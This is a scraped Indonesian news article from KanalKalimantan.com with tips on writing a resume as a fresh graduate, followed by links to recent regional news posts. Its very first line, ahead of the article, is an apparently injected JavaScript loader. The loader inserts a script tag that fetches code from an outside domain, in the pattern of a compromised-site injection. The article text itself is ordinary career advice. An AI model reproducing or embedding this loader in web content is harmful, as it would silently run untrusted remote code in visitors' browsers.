(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
INSPIRASI

Cara Bikin Resume bagi Fresh Graduate, Perhatikan Hal Ini!


KANALKALIMANTAN.COM – Bagaimana cara dan tips membuat resume untuk fresh graduate? Resume merupakan dokumen yang berisi ringkasan riwayat hidup seperti pendidikan, keahlian, pengalaman kerja, dan lainnya guna melamar pekerjaan di suatu perusahaan.

Dengan dokumen tersebut akan memudahkan HRD untuk mengenali calon karyawannya. Sehingga dapat menilai apakah layak atau tidak untuk melengkapi posisi sesuai lowongan kerja tersebut.

Oleh karenanya, dalam pembuatan resume tidak boleh asal-asalan. Apa yang dituliskan harus valid, singkat, padat dan jelas. Selain itu juga harus sesuai dengan kualifikasi posisi yang dilamar.

Kelihatannya mudah, tapi tidak semua orang tahu bagaimana cara menuliskan resume dengan benar. Bahkan tidak jarang mereka lebih memilih menggunakan jasa pembuatan Curriculum Vitae (CV) online karena tidak punya kemampuan desain.

 

 

Memang kalau hanya membuat lewat Microsoft Word saja maka hasilnya tidak terlalu menarik. Apalagi bagi lulusan baru, biasanya memang belum banyak yang bisa diisikan dalam resume.

Oleh karena itu, pembahasan kali ini kami akan mengulas beberapa tips membuat resume untuk fresh graduate. Agar tidak salah, perhatikan beberapa hal penting berikut ini.

Baca juga : Tampak Elegan, Suzuki Hayabusa 2022 Siap Hadir Dalam Warna Baru

Kegunaan Resume dalam Syarat Lamaran Kerja

Fungsi resume atau CV yakni untuk menginformasikan secara ringkas mengenai diri Anda. Di dalamnya juga memuat informasi mengenai pencapaian atau pengalaman terkait posisi pekerjaan yang Anda dilamar.

Hampir setiap pekerjaan pasti mensyaratkan calon karyawan untuk mengumpulkan CV sebagai syarat administratif. Setelah penyaringan melalui CV Anda, karyawan biasanya akan melanjutkan ke tahap berikutnya seperti tes psikotes atau wawancara.

Inilah alasannya mengapa dalam pembuatan CV tidak boleh sembarangan. CV juga tidak harus selalu dituliskan secara formal dalam kertas berwarna putih menggunakan tinta hitam, melainkan dapat didesain sekreatif mungkin.

Karena manajer perekrutan akan melihat seberapa relevan kompetensi diri Anda terhadap kebutuhan perusahaan melalui dokumen tersebut. Anda bisa menampilkan informasi penting terkait pekerjaan agar menarik perhatian HRD.

Namun bagi seorang fresh graduate atau lulusan baru memang masih terbatas dalam hal pengalaman pekerjaan. Maka harus memahami tips membuat resume untuk fresh graduate agar tetap terlihat profesional dan punya kesempatan besar melanjutkan ke tahap berikutnya.

Baca juga : Rapat Evaluasi Kegiatan Tahun 2021, Bupati Kapuas Minta Bangunan di Jalur Hijau Ditertibkan

Tips Membuat Resume untuk Fresh Graduate

Ketika baru pertama kalinya akan membuat daftar riwayat hidup untuk melamar pekerjaan kebanyakan bingung harus menentukan desain seperti apa. Bisa saja dibuat sederhana, tapi tentunya kurang menarik di maka HRD perusahaan. Bagi fresh graduate, Anda bisa memperhatikan beberapa tips berikut:

Relevan
Mungkin Anda belum mempunyai banyak pengalaman yang dapat disertakan sebagai riwayat pekerjaan di dalam resume. Sebagai gantinya, Anda dapat menuliskan pengalaman magang, ekstrakurikuler, organisasi kegiatan lainnya yang dirasa relevan dengan posisi tersebut.

Cantumkan kemampuan atau keahlian
Ada baiknya jika mencantumkan kemampuan peserta sertifikasi yang dimiliki. Misalnya sudah mempunyai sertifikat TOEFL, penggunaan software tertentu atau lainnya sesuai dengan pekerjaan yang Anda lamar.

Singkat dan menarik
Sebagai fresh graduate, data yang dicantumkan mungkin masih terbatas. Jadi cobalah untuk membuat isian curriculum vitae singkat dan menarik dengan desain profesional.

Baca juga : Beri Layanan Maksimal Publik, MPP Kota Banjarbaru Diresmikan!

Tonjolkan jawaban “mengapa”
Mengapa perusahaan harus memilih Anda? Penjelasan ini bisa dicantumkan pada bagian tentang diri. Ceritakan secara singkat mengenai diri dan mengapa Anda cocok untuk mengisi posisi tersebut.

Pemilihan font dan warna
Desain CV yang bagus sebaiknya menggunakan jenis warna dan font terbaik. Tulisan harus bisa terbaca dengan jelas dan tidak menimbulkan makna ambigu.

Usahakan untuk memilih warna yang tidak terlalu mencolok misalnya putih, abu-abu muda, atau warna pastel lainnya.

Menggunakan template
Untuk membuat desain CV menarik, Anda bisa memanfaatkan template yang sudah jadi. Penggunaannya tinggal mengisi data diri dan nantinya akan dikonversi sesuai desain yang dipilih.

Cara Membuat Resume Mudah dan Cepat

Dengan kecanggihan teknologi seperti sekarang, membuat resume untuk fresh graduate sebenarnya sangat mudah dan cepat. Bahkan tidak butuh waktu lebih dari 5 menit untuk menyelesaikan selembar curriculum vitae melamar kerja.

Baca juga : Ria Enes dan Susan Sapa Anak-anak yang Penuhi Kids Library

Caranya dengan menggunakan aplikasi atau situs pembuatan CV. Tools seperti itu ada yang gratis maupun berbayar untuk mendapatkan fitur-fitur terlengkap. Cara penggunaannya juga cukup mudah dan praktis.

Secara umum, pengguna hanya perlu memilih template atau desain CV yang diinginkan sesuai daftar tersedia. Setelah itu, pengguna mengisi identitas diri seperti kontak, riwayat pendidikan, pengalaman kerja, pengalaman organisasi, sertifikat dan lain sebagainya.

Dengan adanya situs tersebut maka Anda tidak perlu repot-repot memikirkan desain dan tata letak pada curriculum vitae. Karena biasanya, desain telah dibuat sesuai tampilan resume profesional. Anda bahkan bisa memilih template sesuai dengan profesi.

Nah, jadi bagi para lulusan baru tidak perlu lagi merasa kesulitan atau bingung ketika hendak membuat daftar riwayat hidup. Anda bisa memanfaatkan situs pembuatan resume untuk fresh graduate yang menyediakan koleksi template terlengkap dan desain profesional. (kanalkalimantan.com/al)

Reporter : al
Editor : kk


Desy Arfianty

Recent Posts

Ikuti Bimtek ke Jakarta, Duta dan Kader Digital Audiensi ke Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Suasana akrab terlihat di Mahligai Sultan Adam, Martapura ketika Duta dan Kader… Read More

6 menit ago

Kebut Pekerjaan Fisik, Satgas TMMD dan Warga Kerja Bakti

KANALKALIMANTAN.COM, AMUNTAI - Kebersamaan dan gotong royong tampak saat warga bersama Satgas TNI Manunggal Membangun… Read More

46 menit ago

Melintas di Depan Balai Kota Banjarbaru, 19 Kendaraan Angkutan ODOL Terjaring

KANALKALIMANTAN.COM, BANJARBARU -  Sejumlah kendaraan angkutan Over Dimension Over Load (ODOL) terkena razia oleh jajaran… Read More

1 jam ago

Penertiban Lapak Pasar Lama Laut: Kebiasaan Pembeli Berbelanja di Atas Sepeda Motor

KANALKALIMANTAN.COM, BANJARMASIN - Penertiban lapak pedagang di Jalan Pasar Lama Laut, Kecamatan Banjarmasin Tengah, Kota… Read More

3 jam ago

Peluncuran Pilkada 2024 Kalsel, Jinggle “Ayo Memilih” dan Maskot Si Botan

KANALKALIMANTAN.COM, BANJARBARU - Jinggle 'Ayo Memilih' dan maskot Si Botan menandai peluncuran rangkaian pesta demokrasi… Read More

14 jam ago

This website uses cookies.